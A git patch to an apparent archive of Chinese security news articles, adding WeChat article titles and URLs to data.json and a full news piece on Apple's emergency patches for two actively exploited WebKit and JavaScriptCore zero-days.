From 3bbe9e8b0013d3ebaa85f197fd156c621c7ef40b Mon Sep 17 00:00:00 2001 From: test Date: Wed, 20 Nov 2024 12:21:38 +0000 Subject: [PATCH] =?UTF-8?q?=E8=A1=A5=E4=B8=81=E4=B8=8D=E7=BB=99=E5=8A=9B?= =?UTF-8?q?=EF=BC=8CVMware=20vCenter=20=E4=B8=A5=E9=87=8DRCE=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E=E9=81=AD=E5=88=A9=E7=94=A8=E3=80=81Apple=20=E5=8F=91?= =?UTF-8?q?=E5=B8=83=E7=B4=A7=E6=80=A5=E6=9B=B4=E6=96=B0=E4=BB=A5=E4=BF=AE?= =?UTF-8?q?=E8=A1=A5=E8=A2=AB=E7=A7=AF=E6=9E=81=E5=88=A9=E7=94=A8=E7=9A=84?= =?UTF-8?q?=E9=9B=B6=E6=97=A5=E6=BC=8F=E6=B4=9E=E3=80=81=E8=8B=B9=E6=9E=9C?= =?UTF-8?q?=E7=A1=AE=E8=AE=A4=E9=92=88=E5=AF=B9=20macOS=20=E7=B3=BB?= =?UTF-8?q?=E7=BB=9F=E7=9A=84=E9=9B=B6=E6=97=A5=E6=BC=8F=E6=B4=9E=E6=94=BB?= =?UTF-8?q?=E5=87=BB=E3=80=81vulnhuntr=EF=BC=9A=E5=9F=BA=E4=BA=8E=E5=A4=A7?= =?UTF-8?q?=E8=AF=AD=E8=A8=80=E6=A8=A1=E5=9E=8B=E5=92=8C=E9=9D=99=E6=80=81?= =?UTF-8?q?=E4=BB=A3=E7=A0=81=E5=88=86=E6=9E=90=E7=9A=84=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?=E6=89=AB=E6=8F=8F=E4=B8=8E=E5=88=86=E6=9E=90=E5=B7=A5=E5=85=B7?= =?UTF-8?q?=E3=80=81=E7=B4=AB=E5=85=89=E6=A1=A3=E6=A1=88=E7=AE=A1=E7=90=86?= =?UTF-8?q?=E7=B3=BB=E7=BB=9F=20mergeFile=20SQL=E6=B3=A8=E5=85=A5=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E=E3=80=81=E3=80=90=E5=AE=89=E5=85=A8=E5=9C=88=E3=80=91?= =?UTF-8?q?=E8=8B=B9=E6=9E=9C=E5=8F=91=E5=B8=83=E7=B4=A7=E6=80=A5=E5=AE=89?= =?UTF-8?q?=E5=85=A8=E6=9B=B4=E6=96=B0=E4=BF=AE=E5=A4=8DWebKit=E5=BC=95?= =?UTF-8?q?=E6=93=8E=E4=B8=AD=E7=9A=84=E6=BC=8F=E6=B4=9E=20=E9=BB=91?= =?UTF-8?q?=E5=AE=A2=E5=B7=B2=E7=BB=8F=E5=88=A9=E7=94=A8=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?=E5=B1=95=E5=BC=80=E6=94=BB=E5=87=BB=E3=80=81=E4=B8=80=E6=96=87?= =?UTF-8?q?=E8=AF=BB=E6=87=82SSRF=E6=BC=8F=E6=B4=9E=E3=80=81DataCon?= =?UTF-8?q?=E6=99=9A=E8=87=AA=E4=B9=A0=20|=20=E6=B5=85=E8=B0=88=E5=A4=A7?= =?UTF-8?q?=E6=A8=A1=E5=9E=8B=E8=BE=85=E5=8A=A9=E6=BC=8F=E6=B4=9E=E6=8C=96?= =?UTF-8?q?=E6=8E=98=E3=80=81CVE-2024-20767=20=E5=92=8C=20CVE-2024-21216?= =?UTF-8?q?=20=E7=9A=84=E8=A1=A5=E6=95=91=E6=8E=AA=E6=96=BD=EF=BC=9A?= =?UTF-8?q?=E4=BF=9D=E6=8A=A4=E8=87=AA=E5=B7=B1=E5=85=8D=E5=8F=97=E6=9C=80?= =?UTF-8?q?=E8=BF=91=E4=B8=A4=E4=B8=AA=E5=8F=AF=E5=9C=A8=E9=87=8E=E5=A4=96?= =?UTF-8?q?=E5=88=A9=E7=94=A8=E7=9A=84=E4=B8=A5=E9=87=8D=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?=E7=9A=84=E4=BE=B5=E5=AE=B3=E3=80=81=E5=91=BD=E4=BB=A4=E6=89=A7?= =?UTF-8?q?=E8=A1=8C=E6=BC=8F=E6=B4=9E=E5=9F=BA=E7=A1=80=E3=80=81=E3=80=90?= =?UTF-8?q?=E6=88=90=E5=8A=9F=E5=A4=8D=E7=8E=B0=E3=80=91D-Link=20NAS?= =?UTF-8?q?=E8=BF=9C=E7=A8=8B=E5=91=BD=E4=BB=A4=E6=89=A7=E8=A1=8C=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E=EF=BC=88Cookie=EF=BC=89=E3=80=81CNNVD=20|=20=E5=85=B3?= =?UTF-8?q?=E4=BA=8EPalo=20Alto=20Networks=20PAN-OS=E5=AE=89=E5=85=A8?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E7=9A=84=E9=80=9A=E6=8A=A5=E3=80=81CNNVD=20|?= =?UTF-8?q?=20=E5=85=B3=E4=BA=8EApache=20OFBiz=E5=AE=89=E5=85=A8=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E=E7=9A=84=E9=80=9A=E6=8A=A5=E3=80=81=E4=B8=AD=E9=97=B4?= =?UTF-8?q?=E4=BB=B6=E5=B8=B8=E8=A7=81=E6=BC=8F=E6=B4=9E=E6=80=BB=E7=BB=93?= =?UTF-8?q?=E3=80=81=E8=8B=B9=E6=9E=9C=E7=B4=A7=E6=80=A5=E5=8F=91=E5=B8=83?= =?UTF-8?q?=E5=AE=89=E5=85=A8=E6=9B=B4=E6=96=B0=EF=BC=8C=E4=BF=AE=E5=A4=8D?= =?UTF-8?q?=E5=BD=B1=E5=93=8D=E8=8B=B1=E7=89=B9=E5=B0=94Mac=E7=9A=84?= =?UTF-8?q?=E4=B8=A4=E4=B8=AA=E9=9B=B6=E6=97=A5=E6=BC=8F=E6=B4=9E=E3=80=81?= =?UTF-8?q?=E5=A5=87=E5=AE=89=E4=BF=A1=E9=9B=86=E5=9B=A2=E8=8E=B72024?= =?UTF-8?q?=E5=B9=B4=E4=B8=96=E7=95=8C=E4=BA=92=E8=81=94=E7=BD=91=E5=A4=A7?= =?UTF-8?q?=E4=BC=9A=E6=9D=B0=E5=87=BA=E8=B4=A1=E7=8C=AE=E5=A5=96=E3=80=81?= =?UTF-8?q?=E7=AC=AC=E5=8D=81=E4=B8=89=E6=9C=9F=20=C2=B7=20=E5=AE=89?= =?UTF-8?q?=E9=92=A5=C2=AE=E3=80=8C=E6=BC=8F=E6=B4=9E=E5=A4=84=E7=BD=AE?= =?UTF-8?q?=E6=A0=87=E5=87=86=E4=BD=9C=E4=B8=9A=E7=A8=8B=E5=BA=8F=EF=BC=88?= =?UTF-8?q?SOP=EF=BC=89=E3=80=8D=E5=BE=81=E6=96=87=E5=90=AF=E7=A4=BA?= =?UTF-8?q?=E3=80=81=E4=B8=80=E5=90=8D=E4=BC=98=E7=A7=80CISO=E7=9A=84?= =?UTF-8?q?=E8=87=AA=E8=BF=B0=EF=BC=9A=E6=98=AF=E4=BB=80=E4=B9=88=E6=88=90?= =?UTF-8?q?=E5=B0=B1=E4=BA=86=E6=88=91=3F=E3=80=81=E5=87=A0=E4=B8=AA?= =?UTF-8?q?=E5=B8=B8=E8=A7=81=E7=9A=84=E8=B6=8A=E6=9D=83=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?=E6=8C=96=E6=8E=98=E6=A1=88=E4=BE=8B=E3=80=81=E3=80=90=E5=B7=B2?= =?UTF-8?q?=E5=A4=8D=E7=8E=B0=E3=80=91=E5=AE=9D=E5=85=B0=E5=BE=B7BES?= =?UTF-8?q?=E5=BA=94=E7=94=A8=E6=9C=8D=E5=8A=A1=E5=99=A8=E5=8F=8D=E5=BA=8F?= =?UTF-8?q?=E5=88=97=E5=8C=96=E8=87=B4=E8=BF=9C=E7=A8=8B=E4=BB=A3=E7=A0=81?= =?UTF-8?q?=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E=E3=80=81CNNVD=E5=85=B3?= =?UTF-8?q?=E4=BA=8EPalo=20Alto=20Networks=20PAN-OS=20=E5=AE=89=E5=85=A8?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E7=9A=84=E9=80=9A=E6=8A=A5=E3=80=81CNNVD?= =?UTF-8?q?=E5=85=B3=E4=BA=8EApache=20OFBiz=E5=AE=89=E5=85=A8=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E=E7=9A=84=E9=80=9A=E6=8A=A5=E3=80=81=E4=BF=A1=E6=81=AF?= =?UTF-8?q?=E5=AE=89=E5=85=A8=E6=BC=8F=E6=B4=9E=E5=91=A8=E6=8A=A5=EF=BC=88?= =?UTF-8?q?2024=E5=B9=B4=E7=AC=AC47=E6=9C=9F=EF=BC=89=E3=80=81Palo=20Alto?= =?UTF-8?q?=20Networks=E9=9B=B6=E6=97=A5=E9=98=B2=E7=81=AB=E5=A2=99?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E6=98=AF=E7=94=B1=E5=BC=80=E5=8F=91=E4=BA=BA?= =?UTF-8?q?=E5=91=98=E7=9A=84=E5=9F=BA=E6=9C=AC=E9=94=99=E8=AF=AF=E5=AF=BC?= =?UTF-8?q?=E8=87=B4=E7=9A=84=E3=80=81=E3=80=90=E6=BC=8F=E6=B4=9E=E9=80=9A?= =?UTF-8?q?=E5=91=8A=E3=80=91Oracle=20Agile=20PLM=20Framework=E6=96=87?= =?UTF-8?q?=E4=BB=B6=E6=B3=84=E9=9C=B2=E6=BC=8F=E6=B4=9E=EF=BC=88CVE-2024-?= =?UTF-8?q?21287=EF=BC=89=E3=80=81=E3=80=90=E6=BC=8F=E6=B4=9E=E9=80=9A?= =?UTF-8?q?=E5=91=8A=E3=80=91Wget=E6=9C=8D=E5=8A=A1=E5=99=A8=E7=AB=AF?= =?UTF-8?q?=E8=AF=B7=E6=B1=82=E4=BC=AA=E9=80=A0=E6=BC=8F=E6=B4=9E=EF=BC=88?= =?UTF-8?q?CVE-2024-10524=EF=BC=89=E3=80=81taocms=203.0.1=20=E6=9C=AC?= =?UTF-8?q?=E5=9C=B0=E6=96=87=E4=BB=B6=E6=B3=84=E9=9C=B2=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?=EF=BC=88CVE-2021-44983=EF=BC=89=E3=80=81=E5=B9=B3=E6=9D=BF?= =?UTF-8?q?=E9=94=85(Palo=20Alto)=E9=98=B2=E7=81=AB=E5=A2=990day=20?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E5=88=86=E6=9E=90=E5=8F=8AExp=E3=80=81?= =?UTF-8?q?=E7=BE=8E=E5=9B=BD=E9=A5=AE=E7=94=A8=E6=B0=B4=E7=B3=BB=E7=BB=9F?= =?UTF-8?q?=E5=AD=98=E5=9C=A8300=E5=A4=9A=E4=B8=AA=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?=EF=BC=8C=E5=BD=B1=E5=93=8D1.1=E4=BA=BF=E4=BA=BA=E3=80=81?= =?UTF-8?q?=E3=80=90=E7=9F=A5=E9=81=93=E5=88=9B=E5=AE=87404=E5=AE=9E?= =?UTF-8?q?=E9=AA=8C=E5=AE=A4=E3=80=91=E8=AD=A6=E6=83=95Palo=20Alto=20PAN-?= =?UTF-8?q?OS=E6=BC=8F=E6=B4=9E=EF=BC=88CVE-2024-0012=20=E5=92=8C=20CVE-20?= =?UTF-8?q?24-9474=EF=BC=89=E3=80=81=E4=B8=80=E6=AC=A1=E9=BB=91=E7=9B=92?= =?UTF-8?q?=E8=BD=AC=E5=8F=98=E7=99=BD=E7=9B=92=E5=89=8D=E5=8F=B0=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E=E5=AE=A1=E8=AE=A1=E8=BF=87=E7=A8=8B=E3=80=81=E5=85=A8?= =?UTF-8?q?=E7=90=83=E6=95=B0=E6=8D=AE=E8=B7=A8=E5=A2=83=E6=B5=81=E5=8A=A8?= =?UTF-8?q?=E5=90=88=E4=BD=9C=E5=80=A1=E8=AE=AE=E3=80=81=E7=BE=8E=E5=9B=BD?= =?UTF-8?q?=E5=9B=BD=E4=BC=9A=E5=9B=BE=E4=B9=A6=E9=A6=86=E9=82=AE=E4=BB=B6?= =?UTF-8?q?=E7=B3=BB=E7=BB=9F=E9=81=AD=E6=94=BB=E5=87=BB=EF=BC=8C=E8=BF=91?= =?UTF-8?q?9=E4=B8=AA=E6=9C=88=E9=80=9A=E4=BF=A1=E5=86=85=E5=AE=B9?= =?UTF-8?q?=E6=88=96=E6=B3=84=E9=9C=B2=EF=BC=9BChatGPT=E6=B2=99=E7=AE=B1?= =?UTF-8?q?=E7=8E=AF=E5=A2=83=E5=AD=98=E5=A4=9A=E4=B8=AA=E4=B8=A5=E9=87=8D?= =?UTF-8?q?=E5=AE=89=E5=85=A8=E9=9A=90=E6=82=A3=EF=BC=8C=E4=BB=8520%?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E=E8=A2=AB=E4=BF=AE=E5=A4=8D=20|=20=E7=89=9B?= =?UTF-8?q?=E8=A7=88=E3=80=81?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- data.json | 35 +- ... 发布紧急更新以修补被积极利用的零日漏洞.md | 169 ++++++ doc/CNNVD | 关于Apache OFBiz安全漏洞的通报.md | 71 +++ ...Palo Alto Networks PAN-OS安全漏洞的通报.md | 69 +++ doc/CNNVD关于Apache OFBiz安全漏洞的通报.md | 44 ++ ...Palo Alto Networks PAN-OS 安全漏洞的通报.md | 44 ++ ...护自己免受最近两个可在野外利用的严重漏洞的侵害.md | 99 ++++ doc/DataCon晚自习 | 浅谈大模型辅助漏洞挖掘.md | 469 +++++++++++++++++ ...日防火墙漏洞是由开发人员的基本错误导致的.md | 109 ++++ ....0.1 本地文件泄露漏洞(CVE-2021-44983).md | 30 ++ ...语言模型和静态代码分析的漏洞扫描与分析工具.md | 314 +++++++++++ ...更新修复WebKit引擎中的漏洞 黑客已经利用漏洞展开攻击.md | 91 ++++ ...兰德BES应用服务器反序列化致远程代码执行漏洞.md | 63 +++ ...复现】D-Link NAS远程命令执行漏洞(Cookie).md | 27 + ...e PLM Framework文件泄露漏洞(CVE-2024-21287).md | 48 ++ ...】Wget服务器端请求伪造漏洞(CVE-2024-10524).md | 49 ++ ... Alto PAN-OS漏洞(CVE-2024-0012 和 CVE-2024-9474).md | 28 + doc/一名优秀CISO的自述:是什么成就了我?.md | 149 ++++++ doc/一文读懂SSRF漏洞.md | 168 ++++++ doc/一次黑盒转变白盒前台漏洞审计过程.md | 81 +++ doc/中间件常见漏洞总结.md | 357 +++++++++++++ doc/信息安全漏洞周报(2024年第47期).md | 134 +++++ doc/全球数据跨境流动合作倡议.md | 113 ++++ doc/几个常见的越权漏洞挖掘案例.md | 144 +++++ doc/命令执行漏洞基础.md | 495 ++++++++++++++++++ ...安信集团获2024年世界互联网大会杰出贡献奖.md | 61 +++ ...板锅(Palo Alto)防火墙0day 漏洞分析及Exp.md | 69 +++ ...安钥®「漏洞处置标准作业程序(SOP)」征文启示.md | 132 +++++ doc/紫光档案管理系统 mergeFile SQL注入漏洞.md | 46 ++ ...露;ChatGPT沙箱环境存多个严重安全隐患,仅20%漏洞被修复 | 牛览.md | 262 +++++++++ ...国饮用水系统存在300多个漏洞,影响1.1亿人.md | 59 +-- doc/苹果确认针对 macOS 系统的零日漏洞攻击.md | 38 ++ ...布安全更新,修复影响英特尔Mac的两个零日漏洞.md | 61 +++ 33 files changed, 4081 insertions(+), 47 deletions(-) create mode 100644 doc/Apple 发布紧急更新以修补被积极利用的零日漏洞.md create mode 100644 doc/CNNVD | 关于Apache OFBiz安全漏洞的通报.md create mode 100644 doc/CNNVD | 关于Palo Alto Networks PAN-OS安全漏洞的通报.md create mode 100644 doc/CNNVD关于Apache OFBiz安全漏洞的通报.md create mode 100644 doc/CNNVD关于Palo Alto Networks PAN-OS 安全漏洞的通报.md create mode 100644 doc/CVE-2024-20767 和 CVE-2024-21216 的补救措施:保护自己免受最近两个可在野外利用的严重漏洞的侵害.md create mode 100644 doc/DataCon晚自习 | 浅谈大模型辅助漏洞挖掘.md create mode 100644 doc/Palo Alto Networks零日防火墙漏洞是由开发人员的基本错误导致的.md create mode 100644 doc/taocms 3.0.1 本地文件泄露漏洞(CVE-2021-44983).md create mode 100644 doc/vulnhuntr:基于大语言模型和静态代码分析的漏洞扫描与分析工具.md create mode 100644 doc/【安全圈】苹果发布紧急安全更新修复WebKit引擎中的漏洞 黑客已经利用漏洞展开攻击.md create mode 100644 doc/【已复现】宝兰德BES应用服务器反序列化致远程代码执行漏洞.md create mode 100644 doc/【成功复现】D-Link NAS远程命令执行漏洞(Cookie).md create mode 100644 doc/【漏洞通告】Oracle Agile PLM Framework文件泄露漏洞(CVE-2024-21287).md create mode 100644 doc/【漏洞通告】Wget服务器端请求伪造漏洞(CVE-2024-10524).md create mode 100644 doc/【知道创宇404实验室】警惕Palo Alto PAN-OS漏洞(CVE-2024-0012 和 CVE-2024-9474).md create mode 100644 doc/一名优秀CISO的自述:是什么成就了我?.md create mode 100644 doc/一文读懂SSRF漏洞.md create mode 100644 doc/一次黑盒转变白盒前台漏洞审计过程.md create mode 100644 doc/中间件常见漏洞总结.md create mode 100644 doc/信息安全漏洞周报(2024年第47期).md create mode 100644 doc/全球数据跨境流动合作倡议.md create mode 100644 doc/几个常见的越权漏洞挖掘案例.md create mode 100644 doc/命令执行漏洞基础.md create mode 100644 doc/奇安信集团获2024年世界互联网大会杰出贡献奖.md create mode 100644 doc/平板锅(Palo Alto)防火墙0day 漏洞分析及Exp.md create mode 100644 doc/第十三期 · 安钥®「漏洞处置标准作业程序(SOP)」征文启示.md create mode 100644 doc/紫光档案管理系统 mergeFile SQL注入漏洞.md create mode 100644 doc/美国国会图书馆邮件系统遭攻击,近9个月通信内容或泄露;ChatGPT沙箱环境存多个严重安全隐患,仅20%漏洞被修复 | 牛览.md create mode 100644 doc/苹果确认针对 macOS 系统的零日漏洞攻击.md create mode 100644 doc/苹果紧急发布安全更新,修复影响英特尔Mac的两个零日漏洞.md diff --git a/data.json b/data.json index 9a23257c..9123e78d 100644 --- a/data.json +++ b/data.json @@ -256,5 +256,38 @@ "https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247491464&idx=1&sn=dddb959fc1bb2fdc915c3c0b79b376cc": "漏洞预警 | 全程云OA SQL注入漏洞", "https://mp.weixin.qq.com/s?__biz=MzU3MjU4MjM3MQ==&mid=2247488439&idx=1&sn=3f053aa65cd1e0edc84e4e7baf0d87be": "【0day】资产管理运营系统(资管云)存在前台文件上传漏洞", "https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247502450&idx=1&sn=a1fc8665dfbb9c1703fef3c40ff25310&chksm=fe79eeeac90e67fcbf34eede7835db3aa9916a7a50c559be8c34d0446433f0f4d41189eb8b1a&scene=58&subscene=0": "【在野利用】Palo Alto Networks PAN-OS 身份认证绕过漏洞(CVE-2024-0012)安全风险通告", - "https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247523853&idx=3&sn=fab3ee466334a0022b2df23ab6a23217&chksm=ce46151df9319c0b47c29456be191ccb1e9aa5c9d308c5e785ba7c175b75b7a3f6afe84ca4d6&scene=58&subscene=0": "上周关注度较高的产品安全漏洞(20241111-20241117)" + "https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247523853&idx=3&sn=fab3ee466334a0022b2df23ab6a23217&chksm=ce46151df9319c0b47c29456be191ccb1e9aa5c9d308c5e785ba7c175b75b7a3f6afe84ca4d6&scene=58&subscene=0": "上周关注度较高的产品安全漏洞(20241111-20241117)", + "https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247521523&idx=1&sn=286f99df03f25ebd1cb1fb497f991b21&chksm=ea94a599dde32c8fb84c9a7247de810f5f23bf5c0c99f55a79ff59780dc42aa54f886a151327&scene=58&subscene=0": "补丁不给力,VMware vCenter 严重RCE漏洞遭利用", + "https://mp.weixin.qq.com/s?__biz=MzkzNjIzMjM5Ng==&mid=2247489994&idx=1&sn=7814bfad57686190c7bac0bc2903102f": "Apple 发布紧急更新以修补被积极利用的零日漏洞", + "https://mp.weixin.qq.com/s?__biz=MzA5NzQxMTczNA==&mid=2649166849&idx=3&sn=7d17b619580e9f94e8465b600d569241": "苹果确认针对 macOS 系统的零日漏洞攻击", + "https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651307561&idx=4&sn=4bfa46d48f4a7ec2bcdeb281d95354f8": "vulnhuntr:基于大语言模型和静态代码分析的漏洞扫描与分析工具", + "https://mp.weixin.qq.com/s?__biz=MzkxNjY1MjY3OQ==&mid=2247487940&idx=1&sn=77723ded4c817fa7df978074334ee981": "紫光档案管理系统 mergeFile SQL注入漏洞", + "https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066097&idx=3&sn=0e0cc754f2cdc596b5f8419a8fa6f7a5": "【安全圈】苹果发布紧急安全更新修复WebKit引擎中的漏洞 黑客已经利用漏洞展开攻击", + "https://mp.weixin.qq.com/s?__biz=Mzk0NTY5Nzc1OA==&mid=2247484133&idx=1&sn=52effc09cdcd03efa6380224aa30ad9c": "一文读懂SSRF漏洞", + "https://mp.weixin.qq.com/s?__biz=MzU5Njg1NzMyNw==&mid=2247488664&idx=2&sn=3e7b7e7edab1dffabf0816e27d18da3b": "DataCon晚自习 | 浅谈大模型辅助漏洞挖掘", + "https://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247524380&idx=3&sn=f9182149d88336b1242adda5aef422d1": "CVE-2024-20767 和 CVE-2024-21216 的补救措施:保护自己免受最近两个可在野外利用的严重漏洞的侵害", + "https://mp.weixin.qq.com/s?__biz=Mzg4MDY1MzUzNw==&mid=2247497938&idx=2&sn=8d13015033c4c8514aac0c0c5375b9df": "命令执行漏洞基础", + "https://mp.weixin.qq.com/s?__biz=MzU2NDgzOTQzNw==&mid=2247502616&idx=1&sn=58bb44c2b1e5b68a5db14bccb1baca21": "【成功复现】D-Link NAS远程命令执行漏洞(Cookie)", + "https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664230091&idx=4&sn=263ea32ebfc468c8a503fd8a7d847988": "CNNVD | 关于Palo Alto Networks PAN-OS安全漏洞的通报", + "https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664230091&idx=5&sn=9950f25047c9a9cdb95f448751bcd9de": "CNNVD | 关于Apache OFBiz安全漏洞的通报", + "https://mp.weixin.qq.com/s?__biz=Mzg2NDY2MTQ1OQ==&mid=2247522987&idx=1&sn=563d193cf4b9a511831b8769974d8266": "中间件常见漏洞总结", + "https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458583542&idx=2&sn=5be0221a6d9dac5a2b8d75ede77e159b": "苹果紧急发布安全更新,修复影响英特尔Mac的两个零日漏洞", + "https://mp.weixin.qq.com/s?__biz=MzU0NDk0NTAwMw==&mid=2247622153&idx=1&sn=bdaf7d21183b302a2b5c4dcc98808c26": "奇安信集团获2024年世界互联网大会杰出贡献奖", + "https://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484351&idx=1&sn=f9ffabcc9b25602a911778f2121e66fa": "第十三期 · 安钥®「漏洞处置标准作业程序(SOP)」征文启示", + "https://mp.weixin.qq.com/s?__biz=MzU5ODgzNTExOQ==&mid=2247631812&idx=1&sn=cb58ca9f66ae638242515b34d3fee572": "一名优秀CISO的自述:是什么成就了我?", + "https://mp.weixin.qq.com/s?__biz=MzkzODUzMjA1MQ==&mid=2247484575&idx=1&sn=abd69fc656d121c2d04f7988fa8a2bee": "几个常见的越权漏洞挖掘案例", + "https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247492658&idx=1&sn=57ec9a56c1b1cde21b51a26712d252a8": "【已复现】宝兰德BES应用服务器反序列化致远程代码执行漏洞", + "https://mp.weixin.qq.com/s?__biz=MzAxODY1OTM5OQ==&mid=2651461349&idx=1&sn=c2d1b09182648cd2ba67f4f305a63865": "CNNVD关于Palo Alto Networks PAN-OS 安全漏洞的通报", + "https://mp.weixin.qq.com/s?__biz=MzAxODY1OTM5OQ==&mid=2651461349&idx=2&sn=28601f77d7e3146b42cd9e063a788509": "CNNVD关于Apache OFBiz安全漏洞的通报", + "https://mp.weixin.qq.com/s?__biz=MzAxODY1OTM5OQ==&mid=2651461349&idx=3&sn=dd3fcba72938894feeccabe050dc7c05": "信息安全漏洞周报(2024年第47期)", + "https://mp.weixin.qq.com/s?__biz=MzA3NTIyNzgwNA==&mid=2650259511&idx=1&sn=209eedf6288443cf581e203cfc45284c": "Palo Alto Networks零日防火墙漏洞是由开发人员的基本错误导致的", + "https://mp.weixin.qq.com/s?__biz=MzkzNzY5OTg2Ng==&mid=2247500258&idx=2&sn=45c5ee1cc7cae505fcdfb13d0c6b1050": "【漏洞通告】Oracle Agile PLM Framework文件泄露漏洞(CVE-2024-21287)", + "https://mp.weixin.qq.com/s?__biz=MzkzNzY5OTg2Ng==&mid=2247500258&idx=3&sn=2a266e4509b9d0fb089ce92749c6f7ca": "【漏洞通告】Wget服务器端请求伪造漏洞(CVE-2024-10524)", + "https://mp.weixin.qq.com/s?__biz=MzkxODI4NDg3Nw==&mid=2247484726&idx=1&sn=591227dcdebf57686a3a4c2f953505eb": "taocms 3.0.1 本地文件泄露漏洞(CVE-2021-44983)", + "https://mp.weixin.qq.com/s?__biz=MzkzNDIzNDUxOQ==&mid=2247492578&idx=2&sn=fa464eb54666d60dabd0a65ccbaeac63": "平板锅(Palo Alto)防火墙0day 漏洞分析及Exp", + "https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650603759&idx=2&sn=986d8ed76f6fd390e46b43c2cec2df92": "美国饮用水系统存在300多个漏洞,影响1.1亿人", + "https://mp.weixin.qq.com/s?__biz=MzAxNDY2MTQ2OQ==&mid=2650989812&idx=1&sn=fd1211672ea7e1d7357c9909c7600faa": "【知道创宇404实验室】警惕Palo Alto PAN-OS漏洞(CVE-2024-0012 和 CVE-2024-9474)", + "https://mp.weixin.qq.com/s?__biz=MzkyMjM5NDM3NQ==&mid=2247486083&idx=1&sn=eb8dc60a736b80cc2bcd90bc76f825b3": "一次黑盒转变白盒前台漏洞审计过程", + "https://mp.weixin.qq.com/s?__biz=MzA3ODE0NDA4MA==&mid=2649400795&idx=1&sn=99b65e43e266182fd962e758b293c138": "全球数据跨境流动合作倡议", + "https://mp.weixin.qq.com/s?__biz=MjM5Njc3NjM4MA==&mid=2651133464&idx=2&sn=16e48bc09bde1b9e2e0b383257d60d2a": "美国国会图书馆邮件系统遭攻击,近9个月通信内容或泄露;ChatGPT沙箱环境存多个严重安全隐患,仅20%漏洞被修复 | 牛览" } \ No newline at end of file diff --git a/doc/Apple 发布紧急更新以修补被积极利用的零日漏洞.md b/doc/Apple 发布紧急更新以修补被积极利用的零日漏洞.md new file mode 100644 index 00000000..8653bd0a --- /dev/null +++ b/doc/Apple 发布紧急更新以修补被积极利用的零日漏洞.md @@ -0,0 +1,169 @@ +# Apple 发布紧急更新以修补被积极利用的零日漏洞 + 信息安全大事件 2024-11-20 11:55 + +Apple +发布了适用于 +iOS +、 +iPadOS +、 +macOS +、 +visionOS +及其 +Safari Web +浏览器的安全更新,以解决在野外被积极利用的两个零日漏洞。 + +缺陷如下所列 : +- CVE-2024-44308- JavaScriptCore +中的一个漏洞,在处理恶意 +Web +内容时可能导致任意代码执行 + +- CVE-2024-44309- WebKit +中的一个 +Cookie +管理漏洞,在处理恶意 +Web +内容时可能导致跨站点脚本 ( +XSS +) 攻击 + +这家 iPhone +制造商表示,它分别通过改进检查和改进状态管理解决了 +CVE-2024-44308 +和 +CVE-2024-44309 +。 + +关于利用的确切性质知之甚少,但 Apple +承认这两个漏洞 +“ +可能已在基于 +Intel +的 +Mac +系统上被积极利用 +” +。 + +Google +威胁分析小组 ( +TAG +) 的 +Clément Lecigne +和 +Benoît Sevens +因发现并报告这两个漏洞而受到赞誉,这表明它们可能被用作高度针对性政府支持或雇佣兵间谍软件攻击的一部分。 + +这些更新适用于以下设备和操作系统 : +- iOS 18.1.1 和 iPadOS 18.1.1 + - iPhone XS +及更新机型、 +iPad Pro 13 +英寸、 +iPad Pro 12.9 +英寸(第 +3 +代及更新机型)、 +iPad Pro 11 +英寸(第 +1 +代及更新机型)、 +iPad Air +第 +3 +代及更新机型、 +iPad +第 +7 +代及更新机型、 +iPad mini +第 +5 +代及更新机型 + +- iOS 17.7.2 和 iPadOS 17.7.2 + - iPhone XS +及更新机型、 +iPad Pro 13 +英寸、 +iPad Pro 12.9 +英寸(第 +2 +代及更新机型)、 +iPad Pro 10.5 +英寸、 +iPad Pro 11 +英寸(第 +1 +代及更新机型)、 +iPad Air +第 +3 +代及更新机型、 +iPad +第 +6 +代及更新机型、 +iPad mini +第 +5 +代及更新机型 + +- macOS Sequoia 15.1.1 + - +运行 +macOS Sequoia +的 +Mac + +- visionOS 2.1.1 + - Apple Vision Pro + +- Safari 18.1.1 + - +运行 +macOS Ventura +和 +macOS Sonoma +的 +Mac + +到目前为止,Apple +今年已经解决了其软件中的四个零日漏洞,其中包括一个 ( +CVE-2024-27834 +),该漏洞在 Pwn2Own +温哥华黑客竞赛中演示。其他三个版本已于  +2024 +  +年 1 月 +和 3 +月修补。 + +建议用户尽快将设备更新到最新版本,以防范潜在威胁。 + +
尊敬的读者:
感谢您花时间阅读我们提供的这篇文章。我们非常重视您的时间和精力,并深知信息对您的重要性。
